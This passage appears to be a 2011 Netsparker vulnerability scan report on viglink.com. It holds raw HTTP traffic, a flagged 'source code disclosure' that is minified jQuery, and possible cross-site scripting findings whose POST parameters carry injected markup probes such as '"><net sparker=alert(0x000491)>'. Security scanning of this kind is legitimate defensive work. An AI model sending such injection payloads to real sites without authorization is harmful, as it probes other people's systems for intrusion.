x(){b.support.noCloneEvent=false;d.detachEvent("onclick",x)});d.cloneNode(true).fireEvent("onclick")}d=A.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=A.createDocumentFragment();a.appendChild(d.firstChild);b.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;b(function(){var x=A.createElement("div");x.style.width=x.style.paddingLeft="1px";A.body.appendChild(x);b.boxModel=b.support.boxModel=x.offsetWidth===2;A.body.removeChild(x).style.display="none"});a=function(x){var E=A.createElement("div");x="on"+x;var L=x in E;if(!L){E.setAttribute(x,"return;");L=typeof E[x]==="function"}return L};b.support.submitBubbles=a("submit");b.support.changeBubbles=a("change");a=c=d=e=m=null}})();b.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var 
ja="jQuery"+l(),wa=0,pa={};b.extend({cache:{},expando:ja,noData:{embed:true,object:true,applet:true},data:function(a,c,d){if(!(a.nodeName&&b.noData[a.nodeName.toLowerCase()])){a=a==f?pa:a;var g=a[ja],e=b.cache;if(!g&&typeof c==="string"&&d===o)return null;g||(g=++wa);if(typeof c==="object"){a[ja]=g;e[g]=b.extend(true,{},c)}else if(!e[g]){a[ja]=g;e[g]={}}a=e[g];if(d!==o)a[c]=d;return typeof c==="string"?a[c]:a}},removeData:function(a,c){if(!(a.nodeName&&b.noData[a.nodeName.toLowerCase()])){a=a==f?pa:a;var d=a[ja],g=b.cache,e=g[d];if(c){if(e){delete e[c];b.isEmptyObject(e)&&b.removeData(a)}}else{if(b.support.deleteExpando)delete a[b.expando];else a.removeAttribute&&a.removeAttribute(b.expando);delete g[d]}}}});b.fn.extend({data:function(a,c){if(typeof a==="undefined"&&this.length)return b.data(this[0]);else if(typeof a==="object")return this.each(function(){b.data(this,a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(c===o){var g=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(g===o&&this.length)g=b.data(this[0],a);return g===o&&d[1]?this.data(d[0]):g}else return this.trigger("setData"+d[1]+"!",[d[0],c]).each(function(){b.data(this,a,c)})},removeData:function(a){return this.each(function(){b.removeData(this,a)})}});b.extend({queue:function(a,c,d){if(a){c=(c||"fx")+"queue";var g=b.data(a,c);if(!d)return g||[];if(!g||b.isArray(d))g=b.data(a,c,b.makeArray(d));else g.push(d);return g}},dequeue:function(a,c){c=c||"fx";var d=b.queue(a,c),g=d.shift();if(g==="inprogress")g=d.shift();if(g){c==="fx"&&d.unshift("inprogress");g.call(a,function(){b.dequeue(a,c)})}}});b.fn.extend({queue:function(a,c){if(typeof a!=="string"){c=a;a="fx"}if(c===o)return b.queue(this[0],a);return this.each(function(){var d=b.queue(this,a,c);a==="fx"&&d[0]!=="inprogress"&&b.dequeue(this,a)})},dequeue:function(a){return this.each(function(){b.dequeue(this,a)})},delay:function(a,c){a=b.fx?b.fx.speeds[a]||a:a;c=c||"fx";return this.queue(c,function(){var 
d=this;setTimeout(function(){b.dequeue(d,c)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var aa=/[\n\t]/g,da=/\s+/,ha=/\r/g,sa=/href|src|style/,za=/(button|input)/i,ya=/(button|input|object|select|textarea)/i,Fa=/^(a|area)$/i,v=/radio|checkbox/;b.fn.extend({attr:function(a,c){return h(this,a,c,true,b.attr)},removeAttr:function(a){return this.each(function(){b.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(b.isFunction(a))return this.each(function(E){var L=b(this);L.addClass(a.call(this,E,L.attr("class")))});if(a&&typeof a==="string")for(var c=(a||"").split(da),d=0,g=this.length;d<g;d++){var e=this[d];if(e.nodeType===1)if(e.className){for(var m=" "+e.className+" ",n=e.className,C=0,x=c.length;C<x;C++)if(m.indexOf(" "+c[C]+" ")<0)n+=" "+c[C];e.className=b.trim(n)}else e.className=a}return this},removeClass:function(a){if(b.isFunction(a))return this.each(function(x){var E=b(this);E.removeClass(a.call(this,x,E.attr("class")))});if(a&&typeof a==="string"||a===o)for(var c=(a||"").split(da),d=0,g=this.length;d<g;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var m=(" "+e.className+" ").replace(aa," "),n=0,C=c.length;n<C;n++)m=m.replace(" "+c[n]+" "," ");e.className=b.trim(m)}else e.className=""}return this},toggleClass:function(a,c){var d=typeof a,g=typeof c==="boolean";if(b.isFunction(a))return this.each(function(e){var m=b(this);m.toggleClass(a.call(this,e,m.attr("class"),c),c)});return this.each(function(){if(d==="string")for(var e,m=0,n=b(this),C=c,x=a.split(da);e=x[m++];){C=g?C:!n.hasClass(e);n[C?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&b.data(this,"__className__",this.className);this.className=this.className||a===false?"":b.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var c=0,d=this.length;c<d;c++)if((" "+this[c].className+" ").replace(aa," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===o){var 
c=this[0];if(c){if(b.nodeName(c,"option"))return(c.attributes.value||{}).specified?c.value:c.text;if(b.nodeName(c,"select")){var d=c.selectedIndex,g=[],e=c.options;c=c.type==="select-one";if(d<0)return null;var m=c?d:0;for(d=c?d+1:e.length;m<d;m++){var n=e[m];if(n.selected){a=b(n).val();if(c)return a;g.push(a)}}return g}if(v.test(c.type)&&!b.support.checkOn)return c.getAttribute("value")===null?"on":c.value;return(c.value||"").replace(ha,"")}}else{var C=b.isFunction(a);return this.each(function(x){var E=b(this),L=a;if(this.nodeType===1){if(C)L=a.call(this,x,E.val());if(typeof L==="number")L+="";if(b.isArray(L)&&v.test(this.type))this.checked=b.inArray(E.val(),L)>=0;else if(b.nodeName(this,"select")){var Y=b.makeArray(L);b("option",this).each(function(){this.selected=b.inArray(b(this).val(),Y)>=0});if(!Y.length)this.selectedIndex=-1}else this.value=L}})}}});b.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,c,d,g){if(!(!a||a.nodeType===3||a.nodeType===8)){if(g&&c in b.attrFn)return b(a)[c](d);g=a.nodeType!==1||!b.isXMLDoc(a);var e=d!==o;c=g&&b.props[c]||c;if(a.nodeType===1){var m=sa.test(c);if(c in a&&g&&!m){if(e){c==="type"&&za.test(a.nodeName)&&a.parentNode&&b.error("type property can't be changed");a[c]=d}if(b.nodeName(a,"form")&&a.getAttributeNode(c))return a.getAttributeNode(c).nodeValue;if(c==="tabIndex")return(c=a.getAttributeNode("tabIndex"))&&c.specified?c.value:ya.test(a.nodeName)||Fa.test(a.nodeName)&&a.href?0:o;return a[c]}if(!b.support.style&&g&&c==="style"){if(e)a.style.cssText=""+d;return a.style.cssText}e&&a.setAttribute(c,""+d);a=!b.support.hrefNormalized&&g&&m?a.getAttribute(c,2):a.getAttribute(c);return a===null?o:a}return b.style(a,c,d)}}});var H=/\.(.*)$/,X=function(a){return a.replace(/[^\w\s\.\|`]/g,function(c){return"\\"+c})};b.event={add:function(a,c,d,g){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==f&&..
- /policies/ftc

/policies/ftc

https://www.viglink.com/policies/ftc

Request

GET /policies/ftc HTTP/1.1
Referer: https://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=57A19F24EB19902D7F1AF41D775C30AB; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 18 Apr 2011 23:50:51 GMT
Expires: -1
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3096
Connection: close


<!doctype html><html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"><head> <title>VigLink - FTC Disclosure</title> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <meta name="keywords" content="affiliate marketing, monetization, content, optimization"/> <meta name="description" content="Your links can be doing more. Unlock the power of your site&#39;s links and earn extra money from your site automatically, transparently and honestly."/> <meta property="og:title" content="VigLink"/> <meta property="og:type" content="company"/> <meta property="og:url" content="http://www.viglink.com/"/> <meta property="og:image" content="http://www.viglink.com/public/images/logo-icon-small.png"/> <meta property="og:latitude" content="37.7801339"/> <meta property="og:longitude" content="-122.396744"/> <meta property="og:street-address" content="539 Bryant St Suite 400"/> <meta property="og:locality" content="San Francisco"/> <meta property="og:region" content="CA"/> <meta property="og:postal-code" content="94107"/> <meta property="og:country-name" content="USA"/> <meta property="og:email" content="info@viglink.com"/> <meta property="og:phone_number" content="+1 (415) 963-9826"/> <meta property="og:fax_number" content="+1 (415) 520-6695"/> <meta property="og:site_name" content="VigLink"/> <meta property="fb:admins" content="6003321,705684"/> <link rel="icon" type="image/png" href="/public/images/favicon.png"/> <link rel="alternate" type="application/rss+xml" title="VigLink Blog &raquo; Feed" href="http://blog.viglink.com/feed/" /> <script type="text/javascript"> var ENV = { account: { }, cookie: { domain: '.viglink.com', suffix: 'p' ? 
'.p' : '' } }; </script> <link rel="stylesheet" type="text/css" href="/combined.css.h-1806938078.pack" charset="utf-8"/><link rel="stylesheet" type="text/css" href="/combined.css.h-785608775.pack" charset="utf-8"/><script type="text/javascript" src="/combined.js.h898114336.pack" charset="utf-8"></script><script type="text/javascript" src="/combined.js.h878398113.pack" charset="utf-8"></script><!--[if IE 7]><link rel="stylesheet" href="/public/css/ie7.css" type="text/css" /><![endif]--></head><body> <div id="header"> <div class="content"> <h1><a href="/">VigLink</a></h1> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><span class="delimiter"></span> <ul class="navigation"> <li><a href="/users/signup">Sign Up</a></li><li><a href="/users/login">Log In</a></li></ul> </div></div><div id="body"> <h2><abbr title="Federal Trade Commission">FTC</abbr> Disclosure</h2><div> <div class="column span-7"> <h3>Readers</h3> <p> The site that brought you here uses VigLink to automatically affiliate their commercial links. They've linked to this page because they want you to know that they sometimes get paid if you click one of those links and purchase a product or service. Regardless of this potential revenue, unless stated otherwise, the site only recommends products or services they use personally. </p> <a href="/corp/publishers">Learn More about VigLink</a>. </div> <div class="column span-5"> <div class="aside"> <h3>More Information</h3> <p class="intro"> This disclosure is provided in accordance with the Federal Trade Commission's 16 <abbr title="Code of Federal Regulations">CFR</abbr> &#167; 255.5: <a href="http://www.ftc.gov/os/2009/10/091005endorsementguidesfnnotice.pdf">Guides Concerning the Use of Endorsements and Testimonials in Advertising</a>. 
</p> <h5>Opt Out</h5> <p> You can <a href="/optout">opt out of VigLink</a> for sites that you visit. </p> </div> </div></div><div> <h3>Publishers</h3> <h4>Disclosure</h4> <div class="column span-50p"> <p> The Federal Trade Commission requires that you disclose to your readers when you endorse a product or service and have a "material connection" to the seller. If you're using affiliated links, with or without VigLink, you have that connection. </p> <p> These <abbr title="Federal Trade Commission">FTC</abbr> guidelines are <a href="http://www.ftc.gov/os/2009/10/091005endorsementguidesfnnotice.pdf">available online</a>. (Specifically, look at &#167; 255.5, beginning on page 75.) </p> <h4>Referral Program</h4> <p> Links to viglink.com from your VigLink-enabled pages are automatically included in our referral program. If one of your visitors follows one of those links and signs up for VigLink, <strong>you get a 10% commission</strong>! </p> <h4>Badges</h4> <p> Linking to this page with one of our badges is a great way participate in our referral program while simultaneously disclosing to your readers that you use VigLink to monetize links. 
</p> </div> <div class="column span-50p"> <h5>Badges</h5> <ul id="badges"> <li> <a href="http://www.viglink.com/policies/ftc" class="120x55"> <img src="/public/images/badges/120x55.png" width="120" height="55" title="Links monetized by VigLink"/> <span class="dimensions">120&#215;55</span> </a> </li> <li> <a href="http://www.viglink.com/policies/ftc" class="120x40"> <img src="/public/images/badges/120x40.png" width="120" height="40"/> <span class="dimensions">120&#215;40</span> </a> </li> <li> <a href="http://www.viglink.com/policies/ftc" class="80x40"> <img src="/public/images/badges/80x40.png" width="80" height="40"/> <span class="dimensions">80&#215;40</span> </a> </li> <li> <a href="http://www.viglink.com/policies/ftc" class="150x25"> <img src="/public/images/badges/150x25.png" width="150" height="25"/> <span class="dimensions">150&#215;25</span> </a> </li> <li> <a href="http://www.viglink.com/policies/ftc?vgtag=badge" class="text">Links monetized by <span style="background: transparent url(http://www.viglink.com/public/images/favicon.png) no-repeat 0% 50%; padding-left: 18px;"> VigLink</span></a> </li> </ul> <h5>Badge HTML</h5> <textarea spellcheck="false" readonly="readonly" class="code"></textarea> <script type="text/html" id="badge_html"> <a href="http://www.viglink.com/policies/ftc?vgtag=badge"><img src="http://www.viglink.com/public/images/badges/<?= width + 'x' + height ?>.png" width="<?= width ?>" height="<?= height ?>" title="Links monetized by VigLink"/></a> </script> </div></div></div> <div id="footer"> <ul class="navigation"> <li><a href="/jobs" class="jobs">We're Hiring!</a></li><li><a href="/corp/publishers">Publishers</a></li><li><a href="/corp/merchants">Merchants</a></li><li><a href="/support/faq">FAQ</a></li><li><a href="http://blog.viglink.com/">Blog</a></li></ul><ul class="social navigation"> <li class="twitter"><a href="http://www.twitter.com/viglink"><strong>Follow us</strong> on Twitter</a></li> <li class="facebook"><a 
href="http://www.facebook.com/viglink"><strong>Become a fan</strong> on Facebook</a></li> </ul> <ul class="minor navigation"> <li><a href="/about">About</a></li> <li><a href="/jobs">Jobs</a></li> <li><a href="/about/press">Press</a></li> <li><a href="/policies/tos">Terms of Service</a></li> <li><a href="/policies/privacy">Privacy Policy</a></li> <li><a href="/policies/ftc">FTC Disclosure</a></li> <li><a href="/support">Contact Us</a></li> </ul> <span> &copy; VigLink 2011</span></div><script type="text/javascript"> var is_ssl = ("https:" == document.location.protocol); var asset_host = is_ssl ? "https://s3.amazonaws.com/getsatisfaction.com/" : "http://s3.amazonaws.com/getsatisfaction.com/"; document.write(unescape("%3Cscript src='" + asset_host + "javascripts/feedback-v2.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> (function() { try { new GSFN.feedback_widget({ display: "overlay", company: "viglink", placement: "right", color: ";", style: "question" }); } catch(err) {} })(); </script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-8560005-1"); pageTracker._trackPageview(); } catch(err) {} </script> <!-- Served by: www.viglink.com (10.242.201.220) --></body></html>
[Possible] Generic Source Code Disclosure

[Possible] Generic Source Code Disclosure

1 TOTAL
MEDIUM
Netsparker identified a web page that discloses server-side source code. An attacker can obtain the server-side source code of the web application, which can contain sensitive data such as database connection strings, usernames and passwords, along with the technical and business logic of the application.

Impact

Depending on the nature of the source code disclosed, an attacker can mount one or more of the following types of attacks:
  • Access the database or other data resources. With the privileges of the account obtained, attempt to read, update or delete arbitrary data from the database.
  • Access password-protected administrative mechanisms such as "dashboard", "management console" and "admin panel", potentially leading to full control of the application.
  • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take

  1. Confirm exactly which aspects of the source code are actually disclosed; due to limitations of these types of vulnerability, it might not be possible to confirm this in all instances. Confirm this is not intended functionality.
  2. If it is a file required by the application, change its permissions to prevent public users from accessing it. If it is not, then remove it from the web server.
  3. Ensure that the server has all the current security patches applied.
  4. Remove all temporary and backup files from the web server.

Required Skills for Successful Exploitation

This is dependent on the information obtained from the source code. Uncovering these forms of vulnerabilities does not require a high level of skill. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application resides on.

External References

- /combined.js.h898114336.pack

/combined.js.h898114336.pack

http://www.viglink.com/combined.js.h898114336.pack

Request

GET /combined.js.h898114336.pack HTTP/1.1
Referer: http://www.viglink.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.viglink.com
Cookie: JSESSIONID=CEF7843FA8178E6F5D0D7AB172BA439B; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Encoding:
Content-Type: text/javascript;charset=utf-8
Date: Mon, 18 Apr 2011 23:50:51 GMT
ETag: pack898114336
Expires: Thu, 15 Apr 2021 23:50:51 GMT
X-Powered-By: pack:tag
transfer-encoding: chunked
Connection: keep-alive


(function(f,o){function t(){if(!b.isReady){try{A.documentElement.doScroll("left")}catch(a){setTimeout(t,1);return}b.ready()}}function k(a,c){c.src?b.ajax({url:c.src,async:false,dataType:"script"}):b.globalEval(c.text||c.textContent||c.innerHTML||"");c.parentNode&&c.parentNode.removeChild(c)}function h(a,c,d,g,e,m){var n=a.length;if(typeof c==="object"){for(var C in c)h(a,C,c[C],g,e,d);return a}if(d!==o){g=!m&&g&&b.isFunction(d);for(C=0;C<n;C++)e(a[C],c,g?d.call(a[C],C,e(a[C],c)):d,m);return a}return n?e(a[0],c):o}function l(){return(new Date).getTime()}function u(){return false}function J(){return true}function B(a,c,d){d[0].type=a;return b.event.handle.apply(c,d)}function r(a){var c,d=[],g=[],e=arguments,m,n,C,x,E,L;n=b.data(this,"events");if(!(a.liveFired===this||!n||!n.live||a.button&&a.type==="click")){a.liveFired=this;var Y=n.live.slice(0);for(x=0;x<Y.length;x++){n=Y[x];n.origType.replace(H,"")===a.type?g.push(n.selector):Y.splice(x--,1)}m=b(a.target).closest(g,a.currentTarget);E=0;for(L=m.length;E<L;E++)for(x=0;x<Y.length;x++){n=Y[x];if(m[E].selector===n.selector){C=m[E].elem;g=null;if(n.preType==="mouseenter"||n.preType==="mouseleave")g=b(a.relatedTarget).closest(n.selector)[0];if(!g||g!==C)d.push({elem:C,handleObj:n})}}E=0;for(L=d.length;E<L;E++){m=d[E];a.currentTarget=m.elem;a.data=m.handleObj.data;a.handleObj=m.handleObj;if(m.handleObj.origHandler.apply(m.elem,e)===false){c=false;break}}return c}}function P(a,c){return"live."+(a&&a!=="*"?a+".":"")+c.replace(/\./g,"`").replace(/ /g,"&")}function M(a,c){var d=0;c.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var g=b.data(a[d++]),e=b.data(this,g);if(g=g&&g.events){delete e.handle;e.events={};for(var m in g)for(var n in g[m])b.event.add(this,m,g[m][n],g[m][n].data)}}})}function i(a,c,d){var g,e,m;c=c&&c[0]?c[0].ownerDocument||c[0]:A;if(a.length===1&&typeof 
a[0]==="string"&&a[0].length<512&&c===A&&!Ra.test(a[0])&&(b.support.checkClone||!Sa.test(a[0]))){e=true;if(m=b.fragments[a[0]])if(m!==1)g=m}if(!g){g=c.createDocumentFragment();b.clean(a,c,g,d)}if(e)b.fragments[a[0]]=m?g:1;return{fragment:g,cacheable:e}}function q(a,c){var d={};b.each(Ta.concat.apply([],Ta.slice(0,c)),function(){d[this]=a});return d}function s(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var b=function(a,c){return new b.fn.init(a,c)},D=f.jQuery,I=f.$,A=f.document,K,V=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,R=/^.[^:#\[\.,]*$/,ga=/\S/,oa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,ra=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,ka=navigator.userAgent,O=false,N=[],Q,w=Object.prototype.toString,T=Object.prototype.hasOwnProperty,la=Array.prototype.push,ba=Array.prototype.slice,ea=Array.prototype.indexOf;b.fn=b.prototype={init:function(a,c){var d,g,e;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!c){this.context=A;this[0]=A.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=V.exec(a))&&(d[1]||!c))if(d[1]){e=c?c.ownerDocument||c:A;if(g=ra.exec(a))if(b.isPlainObject(c)){a=[A.createElement(g[1])];b.fn.attr.call(a,c,true)}else a=[e.createElement(g[1])];else{g=i([d[1]],[e]);a=(g.cacheable?g.fragment.cloneNode(true):g.fragment).childNodes}return b.merge(this,a)}else{if(g=A.getElementById(d[2])){if(g.id!==d[2])return K.find(a);this.length=1;this[0]=g}this.context=A;this.selector=a;return this}else if(!c&&/^\w+$/.test(a)){this.selector=a;this.context=A;a=A.getElementsByTagName(a);return b.merge(this,a)}else return!c||c.jquery?(c||K).find(a):b(c).find(a);else if(b.isFunction(a))return K.ready(a);if(a.selector!==o){this.selector=a.selector;this.context=a.context}return b.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return ba.call(this,0)},get:function(a){return 
a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,c,d){var g=b();b.isArray(a)?la.apply(g,a):b.merge(g,a);g.prevObject=this;g.context=this.context;if(c==="find")g.selector=this.selector+(this.selector?" ":"")+d;else if(c)g.selector=this.selector+"."+c+"("+d+")";return g},each:function(a,c){return b.each(this,a,c)},ready:function(a){b.bindReady();if(b.isReady)a.call(A,b);else N&&N.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(ba.apply(this,arguments),"slice",ba.call(arguments).join(","))},map:function(a){return this.pushStack(b.map(this,function(c,d){return a.call(c,d,c)}))},end:function(){return this.prevObject||b(null)},push:la,sort:[].sort,splice:[].splice};b.fn.init.prototype=b.fn;b.extend=b.fn.extend=function(){var a=arguments[0]||{},c=1,d=arguments.length,g=false,e,m,n,C;if(typeof a==="boolean"){g=a;a=arguments[1]||{};c=2}if(typeof a!=="object"&&!b.isFunction(a))a={};if(d===c){a=this;--c}for(;c<d;c++)if((e=arguments[c])!=null)for(m in e){n=a[m];C=e[m];if(a!==C)if(g&&C&&(b.isPlainObject(C)||b.isArray(C))){n=n&&(b.isPlainObject(n)||b.isArray(n))?n:b.isArray(C)?[]:{};a[m]=b.extend(g,n,C)}else if(C!==o)a[m]=C}return a};b.extend({noConflict:function(a){f.$=I;if(a)f.jQuery=D;return b},isReady:false,ready:function(){if(!b.isReady){if(!A.body)return setTimeout(b.ready,13);b.isReady=true;if(N){for(var a,c=0;a=N[c++];)a.call(A,b);N=null}b.fn.triggerHandler&&b(A).triggerHandler("ready")}},bindReady:function(){if(!O){O=true;if(A.readyState==="complete")return b.ready();if(A.addEventListener){A.addEventListener("DOMContentLoaded",Q,false);f.addEventListener("load",b.ready,false)}else if(A.attachEvent){A.attachEvent("onreadystatechange",Q);f.attachEvent("onload",b.ready);var a=false;try{a=f.frameElement==null}catch(c){}A.documentElement.doScroll&&a&&t()}}},isFunction:function(a){return 
w.call(a)==="[object Function]"},isArray:function(a){return w.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||w.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!T.call(a,"constructor")&&!T.call(a.constructor.prototype,"isPrototypeOf"))return false;for(var c in a);return c===o||T.call(a,c)},isEmptyObject:function(a){for(var c in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=b.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return f.JSON&&f.JSON.parse?f.JSON.parse(a):(new Function("return "+a))();else b.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&ga.test(a)){var c=A.getElementsByTagName("head")[0]||A.documentElement,d=A.createElement("script");d.type="text/javascript";if(b.support.scriptEval)d.appendChild(A.createTextNode(a));else d.text=a;c.insertBefore(d,c.firstChild);c.removeChild(d)}},nodeName:function(a,c){return a.nodeName&&a.nodeName.toUpperCase()===c.toUpperCase()},each:function(a,c,d){var g,e=0,m=a.length,n=m===o||b.isFunction(a);if(d)if(n)for(g in a){if(c.apply(a[g],d)===false)break}else for(;e<m;){if(c.apply(a[e++],d)===false)break}else if(n)for(g in a){if(c.call(a[g],g,a[g])===false)break}else for(d=a[0];e<m&&c.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(oa,"")},makeArray:function(a,c){var d=c||[];if(a!=null)a.length==null||typeof a==="string"||b.isFunction(a)||typeof a!=="function"&&a.setInterval?la.call(d,a):b.merge(d,a);return d},inArray:function(a,c){if(c.indexOf)return c.indexOf(a);for(var d=0,g=c.length;d<g;d++)if(c[d]===a)return d;return-1},merge:function(a,c){var d=a.length,g=0;if(typeof c.length==="number")for(var e=c.length;g<e;g++)a[d++]=c[g];else for(;c[g]!==o;)a[d++]=c[g++];a.length=d;return 
a},grep:function(a,c,d){for(var g=[],e=0,m=a.length;e<m;e++)!d!==!c(a[e],e)&&g.push(a[e]);return g},map:function(a,c,d){for(var g=[],e,m=0,n=a.length;m<n;m++){e=c(a[m],m,d);if(e!=null)g[g.length]=e}return g.concat.apply([],g)},guid:1,proxy:function(a,c,d){if(arguments.length===2)if(typeof c==="string"){d=a;a=d[c];c=o}else if(c&&!b.isFunction(c)){d=c;c=o}if(!c&&a)c=function(){return a.apply(d||this,arguments)};if(a)c.guid=a.guid=a.guid||c.guid||b.guid++;return c},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});ka=b.uaMatch(ka);if(ka.browser){b.browser[ka.browser]=true;b.browser.version=ka.version}if(b.browser.webkit)b.browser.safari=true;if(ea)b.inArray=function(a,c){return ea.call(c,a)};K=b(A);if(A.addEventListener)Q=function(){A.removeEventListener("DOMContentLoaded",Q,false);b.ready()};else if(A.attachEvent)Q=function(){if(A.readyState==="complete"){A.detachEvent("onreadystatechange",Q);b.ready()}};(function(){b.support={};var a=A.documentElement,c=A.createElement("script"),d=A.createElement("div"),g="script"+l();d.style.display="none";d.innerHTML=" <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var 
[Possible] Cross-site Scripting

2 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is an XSS (Cross-site Scripting) issue here but could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might target an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; good examples include OWASP Reform and the Microsoft Anti-Cross-site Scripting library.

- /users/action/presales

/users/action/presales

http://www.viglink.com/users/action/presales

Parameters

Parameter Type Value
email POST '"><net sparker=alert(0x000491)>
domain POST 3
format POST json

Notes

Due to the content-type of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The content-type indicates that exploitation may be possible by changing the attack; however, Netsparker does not support confirming these issues, so you need to confirm this problem manually. Generally, a lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers that perform automatic MIME sniffing, such as Internet Explorer.

Request

POST /users/action/presales HTTP/1.1
Referer: http://www.viglink.com/corp/publishers
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.viglink.com
Cookie: JSESSIONID=568C01F6733C4EF745CF86FDB29B8CA8; vglnk.Agent.p=bfddb90717c6db6b0a7878196952ce96
Content-Length: 74
Accept-Encoding: gzip, deflate

email='%22%3e%3cnet+sparker%3dnetsparker(0x000491)%3e&domain=3&format=json

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: application/json
Date: Mon, 18 Apr 2011 23:52:30 GMT
Expires: -1
Pragma: no-cache
Content-Length: 101
Connection: keep-alive


{"message":"''\"><net sparker=netsparker(0x000491)>' is not a valid email address.","result":false}
- /users/action/presales

/users/action/presales

http://www.viglink.com/users/action/presales

Parameters

Parameter Type Value
email POST netsparker@example.com
domain POST '"><net sparker=alert(0x0004B9)>
format POST json

Notes

